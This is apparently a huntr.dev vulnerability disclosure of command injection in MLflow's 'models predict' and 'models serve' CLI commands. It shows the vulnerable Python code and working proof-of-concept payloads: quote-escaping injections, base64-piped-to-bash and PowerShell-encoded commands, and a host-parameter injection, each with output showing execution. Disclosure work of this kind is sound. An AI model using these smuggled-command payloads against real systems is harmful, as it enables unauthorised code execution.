Multiple command injections in `mlflow models` CLI action

2023-04-3001:22:02

adeadfed

www.huntr.dev

mlflow

command injection

predict

serve

security vulnerability

EPSS

Percentile

9.6%

JSON

Description

The mlflow cli executable is vulnerable to a command injection attack in mlflow models predict and mlflow models serve actions. The aforementioned actions is defined in file mlflow\models\cli.py, and uses a vulnerable predict and serve methods of a dynamically resolved instance of PyFuncBackend class, from a mlflow\pyfunc\backend.py file.

[Bug 1] `mlflow models predict` command injection

The code of the PyFuncBackend.predict method can be seen below:

def predict(self, model_uri, input_path, output_path, content_type):
    """
    Generate predictions using generic python model saved with MLflow. The expected format of
    the input JSON is the Mlflow scoring format.
    Return the prediction results as a JSON.
    """
    local_path = _download_artifact_from_uri(model_uri)
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    local_uri = path_to_local_file_uri(local_path)

    if self._env_manager != _EnvManager.LOCAL:
        command = (
            'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
            "model_uri={model_uri}, "
            "input_path={input_path}, "
            "output_path={output_path}, "
            "content_type={content_type})"
            '"'
        ).format(
            model_uri=repr(local_uri),
            input_path=repr(input_path),
            output_path=repr(output_path),
            content_type=repr(content_type),
        )
        return self.prepare_env(local_path).execute(command)
    else:
        scoring_server._predict(local_uri, input_path, output_path, content_type)

The application dynamically constructs a CMD command by injecting the user input into the predefined placeholders, and passes it to the the mlflow.utils.Environment.execute method, which essentially runs the newly created console command.

The application uses built-in python function repr to add quotes around the user input. Nonetheless, repr will not prevent the attacker from injecting a double quote into the CLI parameters to escape from the python -c "" parameter, as can be seen from the below example:

&gt;&gt;&gt; local_uri='LOCAL_URI'
&gt;&gt;&gt; input_path='INPUT_PATH'
&gt;&gt;&gt; output_path='OUTPUT_PATH'
&gt;&gt;&gt; content_type='injection poc"; we are free now; echo "escape the rest'
&gt;&gt;&gt; command = (
...     'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
...     "model_uri={model_uri}, "
...     "input_path={input_path}, "
...     "output_path={output_path}, "
...     "content_type={content_type})"
...     '"'
... ).format(
...     model_uri=repr(local_uri),
...     input_path=repr(input_path),
...     output_path=repr(output_path),
...     content_type=repr(content_type),
... )
&gt;&gt;&gt; print(command)
python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='LOCAL_URI', input_path='INPUT_PATH', output_path='OUTPUT_PATH', content_type='injection poc"; we are free now; echo "escape the rest')"

Thus, it is possible to inject arbitrary commands into the parameters of the mlflow models predict function to obtain an unintended code execution.

[Bug 2] `mlflow models serve` command injection

The code of vulnerable PyFuncBackend.serve method can be seen below.

def serve(
        self,
        model_uri,
        port,
        host,
        timeout,
        enable_mlserver,
        synchronous=True,
        stdout=None,
        stderr=None,
    ):  # pylint: disable=W0221
        """
        Serve pyfunc model locally.
        """
        local_path = _download_artifact_from_uri(model_uri)

        server_implementation = mlserver if enable_mlserver else scoring_server
        command, command_env = server_implementation.get_cmd(
            local_path, port, host, timeout, self._nworkers
        )

        ...
        if self._env_manager != _EnvManager.LOCAL:
            return self.prepare_env(local_path).execute(
                command,
                command_env,
                stdout=stdout,
                stderr=stderr,
                preexec_fn=setup_sigterm_on_parent_death,
                synchronous=synchronous,
            )
        else:
            _logger.info("=== Running command '%s'", command)

            if os.name != "nt":
                command = ["bash", "-c", command]

            child_proc = subprocess.Popen(
                command,
                env=command_env,
                preexec_fn=setup_sigterm_on_parent_death,
                stdout=stdout,
                stderr=stderr,
            )
            ...

The above uses get_cmd function, defined in mlflow/pyfunc/scoring_server/__init__.py that directly formats user input into a command string:

def get_cmd(
    model_uri: str, port: int = None, host: int = None, timeout: int = None, nworkers: int = None
) -&gt; Tuple[str, Dict[str, str]]:
    local_uri = path_to_local_file_uri(model_uri)
    timeout = timeout or MLFLOW_SCORING_SERVER_REQUEST_TIMEOUT.get()
    # NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
    # platform compatibility.
    if os.name != "nt":
        args = [f"--timeout={timeout}"]
        if port and host:
            args.append(f"-b {host}:{port}")
        elif host:
            args.append(f"-b {host}")

        if nworkers:
            args.append(f"-w {nworkers}")

        command = (
            f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
            " -- mlflow.pyfunc.scoring_server.wsgi:app"
        )
    else:
        args = []
        if host:
            args.append(f"--host={host}")

        if port:
            args.append(f"--port={port}")

        command = (
            f"waitress-serve {' '.join(args)} "
            "--ident=mlflow mlflow.pyfunc.scoring_server.wsgi:app"
        )

    command_env = os.environ.copy()
    command_env[_SERVER_MODEL_PATH] = local_uri

    return command, command_env

Proof of Concept

Install required dependencies

Install the latest version of mlflow

pip install mlflow

Install pyenv or conda (prerequisites to get mlflow models predict command to work with non local environments.

Pyenv installation guide

Conda installation guide

Setup mlflow environment

Clone the mlflow repository into a local directory

git clone https://github.com/mlflow/mlflow

Run one of the example mlflow scripts that save a model, e.g. examples/sklearn_logistic_regression/train.py to populate the mlruns directory:

cd mlflow/examples/sklearn_logistic_regression
python train.py

List files inside mlruns/0/ directory to get a valid run ID

ls -l mlruns/0/

total 8
drwxrwxr-x 6 ubuntu ubuntu 4096 Apr 29 19:28 330068e1dfcf43cb8f1cd0e86038d781 # use this id
-rw-rw-r-- 1 ubuntu ubuntu  227 Apr 29 19:28 meta.yaml

[Bug 1] Exploitation

Insert the below payload into input path (-i), output path (-o), or type (-t) parameters:

"; YOUR COMMAND HERE; echo "

For example:

mlflow models predict -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -i 'test"; id; echo "' -o test
2023/04/29 19:48:00 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; id; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "&lt;string&gt;", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                   ^
SyntaxError: unterminated string literal (detected at line 1)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')

If you want to perform some advanced commands that require use of any quotes, you may want to encode your input beforehand.

Injecting advanced payloads for Linux & virtualenv env manager:

# example of encoding a payload to echo "hello from mlflow rce" & run the "id" --env-manager virtualenv
echo 'echo "hello from mlflow rce!"; id;' | base64 

# encoded payload
ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo=

# poc
$ mlflow models predict -m 'runs:/RUN_ID/model/' -i 'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "' -o test
2023/04/29 20:09:37 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "\', output_path=\'test\', content_type=\'json\')"']'
  File "&lt;string&gt;", line 1
    from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
                                                                                                                                                                                                                                   ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce!
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')

Injecting advanced payloads for for Windows & conda env manager:

# example of encoding a payload to echo "hello from mlflow rce" & run the "whoami /all"
https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlIjsgd2hvYW1pIC9hbGw

# encoded payload 
ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA==

# poc
(base) C:\Temp\mlflow\examples\sklearn_logistic_regression&gt;mlflow models predict --env-manager conda -m mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model -i "test"" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo "" " -o test -t json
C:\Users\Strawberry\miniconda3\lib\site-packages\click\core.py:2322: UserWarning: Use of conda is discouraged. If you use it, please ensure that your use of conda complies with Anaconda's terms of service (https://legal.anaconda.com/policies/en/?name=terms-of-service). virtualenv is the recommended tool for environment reproducibility. To suppress this warning, set the MLFLOW_DISABLE_ENV_MANAGER_CONDA_WARNING (default: False, type: bool) environment variable to 'TRUE'.
  value = self.callback(ctx, self, value)
2023/04/30 02:32:40 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 02:32:43 INFO mlflow.utils.conda: Conda environment mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e already exists.
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c ""']'
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model\', input_path=\'test" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo " \', output_path=\'test\', content_type=\'json\')"']'
  File "&lt;string&gt;", line 1
    "from
    ^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce

USER INFORMATION
----------------

User Name                  SID
========================== =============================================
desktop-0gd1eqg\strawberry S-1-5-21-2872549777-3506415077-326829181-1001

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID                                           Attributes
============================================================= ================ ============================================= ==================================================
Everyone                                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114                                     Group used for deny only
DESKTOP-0GD1EQG\docker-users                                  Alias            S-1-5-21-2872549777-3506415077-326829181-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544                                  Group used for deny only
BUILTIN\Hyper-V Administrators                                Alias            S-1-5-32-578                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users                                 Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

\" ', output_path='test', content_type='json')\"

[Bug 2] Exploitation

Insert the command injection payload into the -h (--host) parameter:

mlflow models serve -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -p '80' -h 'localhost & id & localhost'

2023/04/30 11:51:07 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && exec gunicorn --timeout=60 -b localhost & id & localhost:80 -w 1 ${GUNICORN_CMD_ARGS} -- mlflow.pyfunc.scoring_server.wsgi:app']'
...
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
...